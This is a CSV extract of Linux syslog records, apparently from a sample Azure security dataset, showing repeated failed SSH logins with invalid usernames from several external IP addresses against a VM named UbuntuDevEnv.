+1072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:12,UbuntuDevEnv,2019-06-26 18:32:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,65123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:14,UbuntuDevEnv,2019-06-26 18:32:14,auth,UbuntuDevEnv,info,Failed password for invalid user novell from 107.175.127.237 port 40174 ssh2,65123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,novell,107.175.127.2,40174,,
+1074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:14,UbuntuDevEnv,2019-06-26 18:32:14,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 40174:11: Bye Bye [preauth],65123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,40174,,
+1075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:14,UbuntuDevEnv,2019-06-26 18:32:14,auth,UbuntuDevEnv,info,Disconnected from invalid user novell 107.175.127.237 port 40174 [preauth],65123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,novell,107.175.127.2,40174,,
+1076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:17,UbuntuDevEnv,2019-06-26 18:32:17,auth,UbuntuDevEnv,info,Invalid user postgres from 80.108.220.67 port 48598,65125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,80.108.220.6,48598,,
+1077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:17,UbuntuDevEnv,2019-06-26 18:32:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,65125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+1078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:17,UbuntuDevEnv,2019-06-26 18:32:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:20,UbuntuDevEnv,2019-06-26 18:32:19,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 80.108.220.67 port 48598 ssh2,65125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,80.108.220.6,48598,,
+1080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:20,UbuntuDevEnv,2019-06-26 18:32:19,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 80.108.220.67 port 48598 [preauth],65125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,80.108.220.6,48598,,
+1081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:20,UbuntuDevEnv,2019-06-26 18:32:19,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 48598:11: Bye Bye [preauth],65125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,48598,,
+1082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:34,UbuntuDevEnv,2019-06-26 18:32:34,auth,UbuntuDevEnv,info,Invalid user office from 165.227.41.202 port 43624,65202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,165.227.41.2,43624,,
+1083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:34,UbuntuDevEnv,2019-06-26 18:32:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:34,UbuntuDevEnv,2019-06-26 18:32:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,65202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:36,UbuntuDevEnv,2019-06-26 18:32:36,auth,UbuntuDevEnv,info,Failed password for invalid user office from 165.227.41.202 port 43624 ssh2,65202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,165.227.41.2,43624,,
+1086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:36,UbuntuDevEnv,2019-06-26 18:32:36,auth,UbuntuDevEnv,info,Disconnected from invalid user office 165.227.41.202 port 43624 [preauth],65202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,165.227.41.2,43624,,
+1087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:36,UbuntuDevEnv,2019-06-26 18:32:36,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 43624:11: Bye Bye [preauth],65202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,43624,,
+1088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:29,UbuntuDevEnv,2019-06-26 18:34:29,auth,UbuntuDevEnv,info,Invalid user gmodserver from 165.227.41.202 port 34598,65603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmodserver,165.227.41.2,34598,,
+1089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:29,UbuntuDevEnv,2019-06-26 18:34:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:29,UbuntuDevEnv,2019-06-26 18:34:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,65603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:31,UbuntuDevEnv,2019-06-26 18:34:31,auth,UbuntuDevEnv,info,Failed password for invalid user gmodserver from 165.227.41.202 port 34598 ssh2,65603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmodserver,165.227.41.2,34598,,
+1092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:31,UbuntuDevEnv,2019-06-26 18:34:31,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 34598:11: Bye Bye [preauth],65603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,34598,,
+1093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:31,UbuntuDevEnv,2019-06-26 18:34:31,auth,UbuntuDevEnv,info,Disconnected from invalid user gmodserver 165.227.41.202 port 34598 [preauth],65603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmodserver,165.227.41.2,34598,,
+1094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:32,UbuntuDevEnv,2019-06-26 18:34:31,auth,UbuntuDevEnv,info,Invalid user umesh from 107.175.127.237 port 57358,65613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,umesh,107.175.127.2,57358,,
+1095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:32,UbuntuDevEnv,2019-06-26 18:34:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:32,UbuntuDevEnv,2019-06-26 18:34:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,65613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:34,UbuntuDevEnv,2019-06-26 18:34:34,auth,UbuntuDevEnv,info,Failed password for invalid user umesh from 107.175.127.237 port 57358 ssh2,65613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,umesh,107.175.127.2,57358,,
+1098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:35,UbuntuDevEnv,2019-06-26 18:34:34,auth,UbuntuDevEnv,info,Disconnected from invalid user umesh 107.175.127.237 port 57358 [preauth],65613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,umesh,107.175.127.2,57358,,
+1099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:34:35,UbuntuDevEnv,2019-06-26 18:34:34,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 57358:11: Bye Bye [preauth],65613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,57358,,
+1100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:19,UbuntuDevEnv,2019-06-26 18:36:19,auth,UbuntuDevEnv,info,Invalid user testuser from 165.227.41.202 port 53704,66000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,165.227.41.2,53704,,
+1101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:19,UbuntuDevEnv,2019-06-26 18:36:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,66000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:19,UbuntuDevEnv,2019-06-26 18:36:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:22,UbuntuDevEnv,2019-06-26 18:36:21,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 165.227.41.202 port 53704 ssh2,66000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,165.227.41.2,53704,,
+1104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:22,UbuntuDevEnv,2019-06-26 18:36:21,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 53704:11: Bye Bye [preauth],66000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,53704,,
+1105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:22,UbuntuDevEnv,2019-06-26 18:36:21,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 165.227.41.202 port 53704 [preauth],66000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,165.227.41.2,53704,,
+1106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:52,UbuntuDevEnv,2019-06-26 18:36:51,auth,UbuntuDevEnv,info,Invalid user poll from 107.175.127.237 port 46310,66115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,poll,107.175.127.2,46310,,
+1107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:52,UbuntuDevEnv,2019-06-26 18:36:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:52,UbuntuDevEnv,2019-06-26 18:36:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,66115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:55,UbuntuDevEnv,2019-06-26 18:36:54,auth,UbuntuDevEnv,info,Failed password for invalid user poll from 107.175.127.237 port 46310 ssh2,66115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,poll,107.175.127.2,46310,,
+1110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:55,UbuntuDevEnv,2019-06-26 18:36:54,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 46310:11: Bye Bye [preauth],66115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,46310,,
+1111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:36:55,UbuntuDevEnv,2019-06-26 18:36:54,auth,UbuntuDevEnv,info,Disconnected from invalid user poll 107.175.127.237 port 46310 [preauth],66115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,poll,107.175.127.2,46310,,
+1112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:38:07,UbuntuDevEnv,2019-06-26 18:38:06,auth,UbuntuDevEnv,info,Invalid user student from 165.227.41.202 port 44518,66386,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,165.227.41.2,44518,,
+1113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:38:07,UbuntuDevEnv,2019-06-26 18:38:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,66386,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:38:07,UbuntuDevEnv,2019-06-26 18:38:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66386,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:38:08,UbuntuDevEnv,2019-06-26 18:38:07,auth,UbuntuDevEnv,info,Failed password for invalid user student from 165.227.41.202 port 44518 ssh2,66386,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,165.227.41.2,44518,,
+1116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:38:08,UbuntuDevEnv,2019-06-26 18:38:08,auth,UbuntuDevEnv,info,Disconnected from invalid user student 165.227.41.202 port 44518 [preauth],66386,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,165.227.41.2,44518,,
+1117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:38:08,UbuntuDevEnv,2019-06-26 18:38:08,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 44518:11: Bye Bye [preauth],66386,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,44518,,
+1118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:09,UbuntuDevEnv,2019-06-26 18:39:08,auth,UbuntuDevEnv,info,Invalid user ubuntu from 107.175.127.237 port 35266,66604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,107.175.127.2,35266,,
+1119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:09,UbuntuDevEnv,2019-06-26 18:39:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:09,UbuntuDevEnv,2019-06-26 18:39:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,66604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:11,UbuntuDevEnv,2019-06-26 18:39:10,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 107.175.127.237 port 35266 ssh2,66604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,107.175.127.2,35266,,
+1122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:11,UbuntuDevEnv,2019-06-26 18:39:10,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 107.175.127.237 port 35266 [preauth],66604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,107.175.127.2,35266,,
+1123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:11,UbuntuDevEnv,2019-06-26 18:39:10,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 35266:11: Bye Bye [preauth],66604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,35266,,
+1124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:33,UbuntuDevEnv,2019-06-26 18:39:33,auth,UbuntuDevEnv,info,Invalid user user from 165.22.251.129 port 33652,66695,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,165.22.251.1,33652,,
+1125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:33,UbuntuDevEnv,2019-06-26 18:39:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.251.129,66695,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.251.1,,0,
+1126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:33,UbuntuDevEnv,2019-06-26 18:39:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66695,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:36,UbuntuDevEnv,2019-06-26 18:39:35,auth,UbuntuDevEnv,info,Failed password for invalid user user from 165.22.251.129 port 33652 ssh2,66695,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,165.22.251.1,33652,,
+1128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:36,UbuntuDevEnv,2019-06-26 18:39:35,auth,UbuntuDevEnv,info,"Received disconnect from 165.22.251.129 port 33652:11: Normal Shutdown, Thank you for playing [preauth]",66695,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.251.1,33652,,
+1129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:36,UbuntuDevEnv,2019-06-26 18:39:35,auth,UbuntuDevEnv,info,Disconnected from invalid user user 165.22.251.129 port 33652 [preauth],66695,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,165.22.251.1,33652,,
+1130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:52,UbuntuDevEnv,2019-06-26 18:39:52,auth,UbuntuDevEnv,info,Invalid user whoopsie from 165.227.41.202 port 35290,66761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,165.227.41.2,35290,,
+1131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:52,UbuntuDevEnv,2019-06-26 18:39:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,66761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
